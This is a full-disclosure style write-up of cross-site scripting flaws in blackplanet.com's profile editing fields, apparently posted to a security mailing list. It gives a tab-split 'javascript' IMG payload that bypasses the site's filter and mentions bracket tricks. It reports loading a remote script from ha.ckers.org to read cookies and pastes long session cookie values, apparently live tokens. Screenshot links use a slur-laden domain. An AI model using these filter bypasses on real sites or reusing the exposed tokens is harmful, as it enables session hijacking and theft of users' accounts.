|
Blackplanet.com=0D
=0D
Homepage:=0D
http://www.blackplanet.com=0D
=0D
Effected files:=0D
input boxes of editing your profile.=0D
=0D
Bypassing blackplanet.com's filters wasn't very hard, they even give alistof acceptable html tags. Some of which =0D
=0D
included: div, base, bgsound, body, br, embed, img and others. =0D
=0D
The list of allowedhtml tags is here:=0D
=0D
http://www.blackplanet.com/help/describe_html_level_popup.html?html_level=50 =0D
=0D
=0D
My first attempt was a tag and below are several ways to create our XSS example. For this first one, make sure =0D
=0D
tab is on and tab jav ascript:=0D
=0D
[IMG SRC="jav ascript:alert('XSS');"]=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/bp1.jpg=0D
http://www.youfucktard.com/xsp/bp2.jpg=0D
=0D
-------------------------=0D
=0D
Here we are using extraneous open brackets to bypass the filter of the disallowed tags =0D
=0D
Screenshots:=0D
=0D
http://www.youfucktard.com/xsp/blackp3.jpg=0D
http://www.youfucktard.com/xsp/blackp4.jpg=0D
=0D
----------------------------=0D
=0D
Using the same example above, now to reveal our cookie data and OMG this cookie is huge!:=0D
=0D
<<<=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/blackp5.jpg=0D
http://www.youfucktard.com/xsp/blackp6.jpg=0D
=0D
If I were toscroll down further you would see the cookie even goes down there! Heres the whole thing cut and pasted:=0D
=0D
This is remote text via xss.js located at ha.ckers.org CP=null*; user_session=09debbe7384762ba06bed4518ca44547d1b6b930-3745-FT41BxYIw4g%3D-Bp9z2S9CCgDykaoD2E3KySJHEma3H722rbhB%2FfVyBSWw25VyfO070qhSLqh%2FROfkj8XcUfDUJyixibp7nFWYCNFtLY7Fs3yet%2B1cFaP319XAw998Xj3LFPH352JxbWKuNuKH4O4vkosEdYVlPfpWwvkvV5T5wRFu8wrDr6i2V%2BHf8wizsIqneVJF6I7zmf7yCwUxI%2F74pEUXk8Ag%2By2fbmhJLnUDUdkpKP85hSEJaluXkVRRullzAdmG30u0xNS3jx6tKa1lOldJGQ8%2F6UOkN3zaQdVBI8VPx6%2Fj4HJlv9hSm6ZUdooVxXe4A930PDJEViGWaHZMPodJUa2r2H1C5%2Fk4l%2F0rVHumYEd06ys6pOaHD0JMCVp3pgAZ%2FaVBG7wQ0xw1Nn388FQtC%2FHbd%2B195uIjapAVaoars10I3NA1NGjaUnUTk5bUhs3I5bpVuk9w0S0KlBbzO0wEhbQ7GcqntQGQG86czsC08%2BFz3lyPGynFDOkgiYfjyaukLGSChB%2BA8oX6yb047ilQOnuN15bZXJUBVVsA4t6l%2BTEUL5c8bwANnZMY85Xdm2mTsBTEn0ohVJqE5vB3KsH%2BLluNZe8VOx34pOYSoXHIsXjfHS1VDtZX0lj4lp58a0Bn%2FGjhtcAFmeut99HfJfxEHqRQUq6L448AHeDvM07O%2BHF0I11WbkR1BakrP2FqjjfJT42FQm7mzWRGw3i4CMSNNJSe0ZQTueBDISA86rbjt8f8iLpts0PNA5A2Fjf222Bj8hINQdPTJ7GAXWX9HVifw4rpYIc0TxTSOYlb3wqvnpJsZ5wm09uRg5Iq8CegPsI6SDtHguWsVFIJxSnQseUWgBB2Ffxdi4XqKvblVX0iISq5zL6NTgKxYtqBns%2Fp0BNfZoQ7zcSA5G2Te0T0U9yF4gHjikMg85o79OQJk%2BY5bDR2czIOeBfML8heHi7LjJ192CLwvfJPvnr%2FTxngD3BnsLWnGqg8%2FWk%2Bj9iOMvsGap1%2BPCTMXFGekArvm67VawC1HwjFsNSZxVKQct23MmAoBEfbe49bE1DoSKxnZ3Xb2uncIQ4nD1EM%2Bk7WoI5JL9weRvA2D99HP0jm7mFV%2Fdb2wqgXX0gNjHvUVUu%2BEiKUuoZajbRgNPfaFS4qg%2FrgTVrGeDUYRDcXGeO8vTCwmJL5Fb2eMyAHrfnddWPcTHGhophW1WOciLQyjtsuaofWeVyOje9q13TCEcyaR23liIZ9npPX9xqrRkL8mg0pYAGf%2FjLomHMudVP%2BqmQ1H7PONnnddtRpRxWqVtPnJI6ZjVlYOn8cPeKtbksmJncSpY3wdH2h8zZMyoNLJekVm2ZQ1zNeycfmjytAI1j; ads_session=667cf3b62081116a981955041ccb3e0de279dd96-498-xFpEhAqQwl4%3D-QABXjDDBlYf%2BdzX1lIfiDn5wS9cQSA85zzVHxKsmHh5sHhhP9WmjmVaTutX9bxsoB4bZ6lA85wiF2I8%2BCoJwJFN02GS4SRLa3qssYSk1PSjKhHHvXOMPaFrMewVpserex4xd1EoutRKSWjLQMLee2yIOcEi4FwMlwk5Jm2y0IleZZXfeJ3XSRe9UEfJspR8naEg9VG9JMug5%2Bt1QY9oH7qEl6VlliWfhX5gIpA%2BsQFx2tapvMR6rPuK7I3z2w3HRsnf%2BtNqmqPmuYVpXvIO4rp8Ka5rcazOkOhmAb43ypQmuKuHfAfWFxeAEaD2=0D
=0D
TjZkhrLp9xeTudF4OLn6t%2BTWxsnC1kY7sTJs%3D; jb_session=2e915e5c518f7b117b483bfe3328a63aec581681-4195-Ohd5=0D
=0D
Eic2jus%3D-7ReNlr3fxxd23LQ0f2UFYy7hT6NN%2FDxVdQR4sX2xUblU%2FQ56zYZgTyNs8zzFrk8ypVtDTdAqDuf0EoTFhoAB6=0D
=0D
tJNxc%2B0jl6%2FH4kbjo70T%2FRSLtrwDaAgIuBlDN2RHbq9CGT2JU7MCWansv8TG2sUifpebrT%2Bn9EQD%2BwHPtmRq9=0D
=0D
hS1SZ6oJtmApkVIMhg0sGdfvanZaCDDXbn%2FZTunVwwh6bvy%2B1Du%2FumeV09GvdGHWvBnvFLNZfI0W%2Fkdk3Kzn%=0D
=0D
2F9EfntLKm6wXNCSbQtoQRqudhbasGzCTL%2Buo9T6ALOUpXSco2nhW8WDPjmLCsKFBBVafH5I8XMgqwhjOJqv9WYt37=0D
=0D
aZnzkIqRS12pv9QfZoIORxGBNInp5PYoBE%2FmBMxg5lV%2BBOLgQPvmBzPOW8WB3ntP30sWTcItA29s%2=0D
=0D
BQtlBZvnHPIvsbGEXBSytYAYrijXbiu91mI9gGkUDtopybWfN4fpgSdpwAsGg2BdXbdjRpLUAIs6ukq%2FZduxS8QVqEuU7=0D
=0D
QSN6GLDPiqHkJMLi8AIjsC5fASDrCSlk4FwSy7xuGmBEbhEqJcyo9e0RhUFlnuvWLxF%2BjBQNHsItuQxFoXsqheZ68zrOsM=0D
=0D
%2F%2FHGXSRAyk3nv3nSdOK02z3jOhZvhgH%2Fcxn3btl1O5PZ2xgMpyo9b9NGaVERDqWEa%2FysG9EGLma7=0D
=0D
LsIFqsexuqeOs%2BkCpbDhQWdCIgV04vkz6EzjFHWQyXZcefnZMRBs5%2BCj5OM4kldvrYPznVIp09FEEbPG%2F9w%2Bfm3c=0D
=0D
7n1inOhve1lDD8kbqdMB674oX6p8uJGxNtRMBPo4%2FLsj0Yr2iZL2pRu0PyI6s6JCydIRvDvFLrPCKFLsQPkUguqUKTLG4=0D
=0D
poSumO3ELl597nAV6%2FdR1o1bnSty8M1M%2BGjQk7nQon7yf4H9VIvE6Uh7bQ%2FF%2FMTQJStNkw%2Be2%2FrikcMvWe=0D
=0D
0Z91OlPDWZ5I9rTizkkED8P8lc%2BJ%2FaWs2jhgHTU7ZHsl%2BKBjRwXt5Sj71bCMlVWD7q7vVCnr8Gulz%2BznlYLo7TE3=0D
=0D
dpeofK3Pj5u9DBOONsU8QV%2B%2B18c6zhtCuLoiQutSAPT2%2FcqbY7Wasj03qspiYwvkhDJ9Ex43xk8OcsxcM2=0D
=0D
JEEweHcyHOXnj%2FASSDt3iJlsztTdaDuafpON%2FhM9%2BshyM%2BuMnTcWQfhRYn4Uf8NZO2PL4xmf6PgdNBThwSeX%=0D
=0D
2BnTahPKfgPfUZaNYGEpVqSezzbPxXWck%3D; al_session=45c785b4e8aab0915123c7ec4f6c97fb2c220454-1361-=0D
=0D
ynYOQkoacpk%3D-ekkHZhJFQOi8Dzk%2BDGYylCTo7Bl7LVxLyO3Ek%2FfluSUCMeA5IWNrxezMrrw8r9rjnQHeu3uI7Uh9D%2F2v16Pmi6THOKRBmPR6r9aRK%2BnQ3jGIT%2BU0hhtVp3%2FAUi4UZOeFkoXlnL3m90W3nPjVCfrqTmMTTBMuu5p5DTbmcVp7mWgpj70BVsm7USVgbjpOpFhHMsmAQIS%2FjGhm%2Bgi5kH7s2FYZj3VtdStmIpw7q5jeqwnOR72ySKefFiJQsMUTqT0k1%2FG9FuvyTQrpDgN78KKprok2TYWCBJZIBHQj62I11nqTrefFw41tmFDDLMrnu4ka18wZykVrsX37S4ls77WD9pfdhAX3QK8mr5fmLvKIt%2BgURp1sXiT2Bh6qmmxOOhi0B2B5V3A0D7w7JvTVjbUi8fmyjaCbpIkWyKk3xM8Ug%3D%3D =0D
=0D
Wenotice the cookie above tracks for:=0D
=0D
user_session=0D
ads_session=0D
jb_sessional_session.=0D
=0D
Well, there you have it, a few ways to bypass blackplanets.com filters tocreate aXSS vuln and even disclose cookie data.=0D